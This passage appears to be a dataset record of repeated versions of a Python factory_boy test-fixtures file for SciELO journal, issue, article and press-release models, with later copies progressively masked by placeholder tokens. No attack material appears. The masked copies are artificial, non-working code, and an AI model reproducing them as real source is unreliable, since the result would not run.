= models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n 
press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass CollectionFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n 
<assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n 
press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass JournalFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n 
<assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import 
token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionFactory(factory.Factory):\n <assignment token>\n 
<assignment token>\n <assignment token>\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n 
total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass LanguageFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, 
